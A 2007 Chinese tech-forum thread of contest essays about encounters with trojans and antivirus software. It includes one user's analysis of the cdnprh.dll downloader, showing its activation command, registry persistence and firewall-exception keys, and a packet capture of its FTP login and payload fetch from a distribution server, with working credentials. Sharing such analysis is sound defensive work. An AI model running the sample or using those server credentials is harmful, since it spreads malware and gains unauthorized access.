　　7、绑架浏览器。使用hijackthis辅助，把这些绑匪统统请出系统去。

　　8、运行“netstat”，查看当前网络的连接情况，是否有偷偷向外报信者。




================================OVER====================================

[[i] 本帖最后由 winr 于 2007-7-11 09:12 编辑 [/i]]

新旧没有限制，但原创新文会更受青睐的。而且旧文还需要承担一个证明的义务，你需要证明网上搜到的那些同样文章确实是你写的。

[quote]原帖由 [i]夜知[/i] 于 Thu, 12 Jul 2007 02:50:42 +0000o4[12am31efo 02:50 发表 [url=http://softbbs.it168.com/redirect.php?goto=findpost&pid=2191058&ptid=499041][img]http://softbbs.it168.com/images/common/back.gif[/img][/url]
新旧没有限制，但原创新文会更受青睐的。而且旧文还需要承担一个证明的义务，你需要证明网上搜到的那些同样文章确实是你写的。 [/quote]

：）谢谢。

网上的文章都加了天极logo的，我贴的则是纯净的图片。（原图BMP，仅转为JPG）
另外，还好，天极转载时保留了我的ID。：）

其他的证明，如果有需要可以再提供。[onion5]

有时间再考虑弄个新文，嘿嘿

我与木马的亲密接触——累死我的木马

[font=宋体][size=10.5pt][color=#000000][font=宋体][size=3]我同木马的相识还要追溯到“千年虫”时期，那时我刚刚购买一台电脑不久，只懂得简单电脑操作的我对电脑防护根本就是一窍不通，所以电脑接网后很快就被网络病毒和木马入侵。万般无奈的我想起一款使用者众多的杀毒软件，便请求电脑高手帮我在机器上安装此款软件。杀毒软件在电脑中开启后，迅速报告病毒的存在并要求查杀，我一不做二不休直接让杀毒软件迅速扫描整个硬盘开始查杀。这一扫描的结果是我的电脑感染成百个病毒，简直就是病入膏肓，惊得我瞠目结舌半天没有反应。不过，恢复平静的我还是让杀毒软件将整个电脑中的病毒都清除了。[/size][/font]
[size=3][font=宋体]病毒的清除使我一时间倍感轻松，高兴之余打开[/font][font=Times New Roman]IE[/font][font=宋体]浏览器准备上网转悠一会儿，就是这种得意忘形的举动，让我登陆网页时发现网页开始自动打开[/font][font=Times New Roman]N[/font][font=宋体]个页面，且弹出的速度极快，让我只有招架之功难有还手之力。我只好用鼠标把一个一个打开的窗口关闭，但我关闭一个它就开启一个，如此循环往复不停的弹出和关闭让我最终败下阵来，握着疼痛的手指，眼睁睁的看着机器开始陷入瘫痪状态，犹如死机一样无法操作，无助的我开始求助于网络高手，他听完我“声嘶力竭”的事件描述，便推荐一款名为“[/font][font=Times New Roman]EWIDO ANTI-SPYWARE[/font][font=宋体]”的防木马软件让我安装后清除电脑中的木马。从新启动电脑后，我半信半疑的从[/font][font=Times New Roman]QQ[/font][font=宋体]上接收上接收了软件的安装包，将软件安装成功。木马防护软件开始启动，首先弹出一对话框，显示出“危险级别很高，红色，请求清除并隔离”这样一段话和几个选项，我顾不得许多，点击“清除并隔离”选项，将查出的木马清除掉。随着清除动作，对话框也消失了，我怀着忐忑不安的心情开启了[/font][font=Times New Roman]IE[/font][font=宋体]浏览器，打开了一个[/font][font=Times New Roman]IE[/font][font=宋体]窗口，但并没有“蹦”出其它一些窗口。我差点高兴的跳起来，困扰我的网页问题终于消失了，我的生活也因木马的清除而恢复了正常。[/font][/size]
[font=宋体][size=3]正因为这次接网的教训，使我以后安装系统接网时，首先把杀毒软件的防火墙开启，特别是我现在使用金山毒霸后电脑的防护效果变得更好了。当然，这也得易于当年我与木马的那一次亲密接触。[/size][/font]
[/color][/size][/font]

[quote]原帖由 [i]winr[/i] 于 2007-7-12 17:38 发表 [url=http://softbbs.it168.com/redirect.php?goto=findpost&pid=2191151&ptid=499041][img]http://softbbs.it168.com/images/common/back.gif[/img][/url]


：）谢谢。

网上的文章都加了天极logo的，我贴的则是纯净的图片。（原图BMP，仅转为JPG）
另外，还好，天极转载时保留了我的ID。：）

其他的证明，如果有需要可以再提供。[onion5]

有时间再考虑 ... [/quote]
[onion1]

10楼文章出自[url]http://study.feloo.com/computer/soft/anquan/200601/129761.html[/url] 并非原创

99年就开始接触电脑，虽然不是学电脑的，但8、9年的经验心得，加之单位数十台电脑不断遇到的各种问题，使我逐渐成为懂得使用电脑。也是经验不断积累的过程。当然，其中的苦乐也是回味无穷。

就说说前阵子遇到的病毒“AV终结者”。

一天电脑用的好好的，突然所有的杀毒软件都没有了。晕了，怎么会这样呢？前面也遇到过木马病毒，先后也买了金山毒霸正版杀入软件，用最新买的杀毒优盘也无法清除。折腾了大半天，一点办法也没有，进安全模式杀毒不行， dos 杀毒也不行，……

最后就差重装系统了，下午5点多，最后灵机一动，想到了杀毒软件公司求助热线，瑞星电话通了，哎，没人接。金山毒霸的客服告知，中了最新的木马病毒，如何下专杀后，一会便解决了。大功告成。。。

少走了不少弯路，呵呵 。。。

猥琐无处不在！

今天得到了那个猥琐的未知病毒（流氓）cdnprh.dll，于是测试了一下，像不到有大大的收获，端到一个大毒窝了！得到了20个卡巴未知样本！



＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

cdnprh.dll样本信息：


Antivirus Version Update Result
AhnLab-V3 2007.6.12.2 06.13.2007  no virus found
AntiVir 7.4.0.32 06.13.2007  no virus found
Authentium 4.93.8 06.12.2007 Possibly a new variant of W32/Downloader-Sml-based!Maximus
Avast 4.7.997.0 06.13.2007  no virus found
AVG 7.5.0.467 06.13.2007  no virus found
BitDefender 7.2 06.13.2007 Generic.Malware.dld!!.B3FEFEC5
CAT-QuickHeal 9.00 06.13.2007  no virus found
ClamAV devel-20070416 06.13.2007  no virus found
DrWeb 4.33 06.13.2007 DLOADER.Trojan
eSafe 7.0.15.0 06.12.2007  no virus found
eTrust-Vet 30.7.3715 06.13.2007  no virus found
Ewido 4.0 06.13.2007  no virus found
FileAdvisor 1 06.13.2007  no virus found
Fortinet 2.85.0.0 06.13.2007  no virus found
F-Prot 4.3.2.48 06.12.2007 W32/Downloader-Sml-based!Maximus
F-Secure 6.70.13030.0 06.13.2007  no virus found
Ikarus T3.1.1.8 06.13.2007  no virus found
Kaspersky 4.0.2.24 06.13.2007  no virus found
McAfee 5051 06.12.2007  no virus found
Microsoft 1.2503 06.13.2007  no virus found
NOD32v2 2327 06.13.2007  no virus found
Norman 5.80.02 06.13.2007  no virus found
Panda 9.0.0.4 06.13.2007 Suspicious file
Prevx1 V2 06.13.2007  no virus found
Sophos 4.18.0 06.12.2007  no virus found
Sunbelt 2.2.907.0 06.09.2007  no virus found
Symantec 10 06.13.2007  no virus found
TheHacker 6.1.6.132 06.11.2007  no virus found
VBA32 3.12.0.1 06.12.2007  no virus found
VirusBuster 4.3.23:9 06.13.2007  no virus found
Webwasher-Gateway 6.0.1 06.13.2007  no virus found


Aditional Information
File size: 5632 bytes
MD5: 574a929ac0e76af7fd85f812fe5d6480
SHA1: 415fcd88cb9c01f647c39b7d5cd02353632689bf



＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝



运行"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start激活病毒后：

注册表改动：

添加：
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions"         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile         Type: REG_DWORD, Length: 4, Data: 0

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

网络动作：

从网上下载一个exe文件到C:\windows\temp\nlfdxfirc.exe并运行之；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

nlfdxfirc.exe激活后：

文件改动：

创建：

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys

删除：

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

注册表改动：

添加：

HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security         Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated*         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID         Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance         Type: REG_DWORD, Length: 4, Data: 1

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

其他：

这时调用cdnprh.dll的rundll32.exe写入了一个注册表信息，也就是昨天的那个乱码情形了：

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml         Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu

这个东西即使使用icesword查看也是乱码，估计加载时是靠那个驱动翻译为正常的信息；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

追寻它下载的那个exe文件的地址：

在查看抓的数据包时，没有直接看到exe文件的地址，但发现了下面的几个数据包：

220 Welcome to blah FTP service.
USER netserv3
韝?箹
331 Please specify the password.
PASS 43243wen9874
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
200 Switching to Binary mode.

PASV
PASV
227 Entering Passive Mode (60,18,146,34,150,163)
?
?
SIZE /plug/179.exe
SIZE /plug/179.exe
213 19776
RETR /plug/179.exe
150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).

一个FTP站点，而且需要账号和密码，根据数据包信息，打开小车的站点资源探测器，地址为[url]ftp://60.18.146.[/url]**/，登陆的用户为netserv3，口令为43243wen9874；

回车，成功登陆上去了！里面有不少文件，打开了plug目录，发现了20个大小相近的exe文件，全部下载下来一看，所有的CRC32校验码都是不同的！又打开了plugback目录，再次发现了20个大小几乎一样的exe文件！据测试是和plug目录里面的一样的；

另外还有一些其他文件，迟些在慢慢研究；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

随便测试了几个，他们的动作和那个nlfdxfirc.exe如出一辙！用卡巴扫描了一下，一个也不报！看来是高手所为了！我想这个东西可能在未来几天内流行起来！希望各位有所警惕！

[quote]原帖由 [i]wj7216[/i] 于 Wed, 25 Jul 2007 12:37:15 +0000o3[25pm31efo 12:37 发表 [url=http://softbbs.it168.com/redirect.php?goto=findpost&pid=2196390&ptid=499041][img]http://softbbs.it168.com/images/common/back.gif[/img][/url]
10楼文章出自[url]http://study.feloo.com/computer/soft/anquan/200601/129761.html[/url] 并非原创 [/quote]

前面就说明了啊，原发于CTIPS。后来被不少网站转载。
你那个网站也是转载自ZOL的吧。

能够拿到那篇文章不加LOGO的图片，只有作者、杂志社和部分网站编辑吧。

如有异议，可以联系相关编辑证实。

我就是原创作者，我没有兴趣冒认别人的文章来充数，呵呵。而且这篇文章随便一搜，到处都是。

杂志应该还在，如果需要，可以扫描上传。：）

我与毒霸的亲密接触。

[onion5] 我现在初二了(快升初三了），还在用毒霸。我用毒霸2年多（玩电脑才三年），一开始是别人给我装的瑞星，后来我觉得不好用（中了毒），就上网问了一下，还以为只有一种杀软的呢？没想道还有那么多。我看着看着，看到有瑞星、卡巴等，当我看到金山毒霸2005的时候我觉得这个好，用一下才知道，好看！我就一直玩（乱点）！那时我还不知道杀毒软件要升级的，中毒后很卡，我就用毒霸杀毒（还没买号的），我说怎么杀不了毒的呢（那时太傻了）？后来叫人帮我修好了我就傻傻的问了一句，[onion8] “杀毒软件是什么？”那个人当场就晕-_-[onion2] 这时他就教我升级，他说你有没序列号？[onion17] “我就说什么是序列号？”那人又[onion40] 我就[onion60] 杀毒软件也要钱？！[onion53] 我就想办法向妈妈要钱买序列号。[onion58] 想到办法后（直说）老妈居然答应了（那是经济非常不好）[onion57] 我还是去买了用着，一直到现在。
我用了金山毒霸后的建意：
1、有点占内存（我的机子卡）；
2、价格有点高，让人望而却步（穷啊）；
3、没用开机杀毒。

我现在没有很多的时间，所以，我以后有时间会补上去。谢谢[onion50] [onion1]

　　[b][size=4][color=red]我与木马的亲密接触[/color][/size][/b]
[b][size=4][color=#ff0000][/color][/size][/b]
　　[color=blue][u]裸奔，相信对程序理解，从不用杀毒软件[/u][/color]
　　我是一名有着3 年经验的老程序员，平时可以说就是和电脑打交道，从软件到硬件
，从PC机到服务器，都有涉及，凭着我对程序的理解我从来都是不用杀毒软件的。也是
我运气好，直到那之前我一直都没有中招，直到那天，中了一个木马，最终吃尽了苦头
！
　　[color=lime][i]裸奔小心得[/i][/color]
　　差开一句，如果有人和我以前一样也喜欢发挥机器最大性能，愿意裸奔的话（毕竟
对我们开发人员来说提升那么一点点性能都是好的，杀毒软件对性能影响是有的），那
我附送我的四点小心得，但其实切忌因小失大啊！
　　发现机器异常立即拔掉网线然后检查以下四点：
[align=left][quote] [/align][align=left]1 、按日期查看windows 目录、 system32目录、 program目录、盘符根目录，并用假[/align][align=left]文件只读替代！[/align][align=left]2 、系统服务[/align][align=left]3 、查注册表的开机器项[/align][align=left]4 、del 内存内的异常进程
[/align][align=left][/quote]　　[/align][align=left][color=blue][u]裸奔终中招，以为杀得了，第一次中毒出现[/u][/color]
　　那天终于到来，是在熊猫烧香的末期，我十分留意门户网站的计算机板块，所以在
烧香出现初期，就十分小心，少下载少装不必要的软件，也一直相安无事。
　　也许是熊猫烧香的末期，放松了警惕，在xunlei的一个软件blog内中招了，是一个
威金的变种木马，于是在windows 目录、 system32 目录、盘符根目录都出现了病毒载
体（并且还在不停网上更新，这是我在最后中招才总结出来的），我按照自己的心得不
紧不慢的拔掉网线，开是查杀，进安全看注册表，安日期查新文件，我删、删、删……
忙了2 小时终于都正常了，开机也很好，于是我查上网线，上IE，也没问题。但是接下
来就是地狱了！
　　[u][color=blue]无可奈何，却不回头，第二次中毒出现[/color][/u]
　　在我运行开发软件时，机器出现过网卡不停闪烁，但我没有留意，之后1 小时很正
常，但突然机器有出现中毒症状，还比刚才严重，比如硬盘闪个不停，网卡不停传输等
等，我有重复之前步骤杀毒，但已经没有效果，只要一上网，就异常缓慢，无奈我去毒
霸网上智能在线查杀去试试运气，没想到，真的可以杀，原来这个威金把所有的EXE 后
缀的文件全部加shell 和它的病毒下载端绑定了，只要运行任何exe 文件，他就会上网
下载病毒！
　　[color=blue][u]最终回，服务器服务端被染，终下苦果[/u][/color]
　　终于经过一天的艰苦杀毒，终于把木马干掉，看着杀毒报告上显示的1w多个exe 的
清除木马报告，我是终于松了口气，但殊不知，还有一个被我忽略的地方，也是这个变
种最可误之处！
　　第二天我们去客户出部署服务器服务端，回来后，到了下午就有客户反映网站异常
，我们立马赶去解决，但非常奇怪的打开其中一个子栏目就会跳到1717XX这个黄色网站
这令客户非常光火，也令我们公司颜面尽失，保证当天解决，我们把网站这个模块停运
，不停查啊查，但仍无结果，最后到了晚上9 点多实在没法子了一行行看代码，终于发
现其中一个JSP 页面代码被病毒改写了，那是在我第一次和第二次中毒期间开发完提交
项目的一个文件，也就是说由于我本人的失误，在杀毒软件查杀了机器前，向项目服务
器提交了感染文件在查杀后没有意识到本机是无毒了，但项目服务器其实被感染了，终
酿大错！给公司和客户造成了严重不良影响！
　　[b]经过这次事件，我意识到在如今会升级会进化的木马面前，裸奔实在是不适[/b]
[b]合时代，为了自身和周围的安全负责，确实需要安装防毒软件啊！以上就是我和[/b]
[b]木马的一点点接触，但就是那么短短的一次造成了巨大代价，实在得不偿失啊！[/b][/align]
[b]以上版权属于it168 不得转载[/b]

[[i] 本帖最后由 lufa2007 于 2007-7-31 20:32 编辑 [/i]]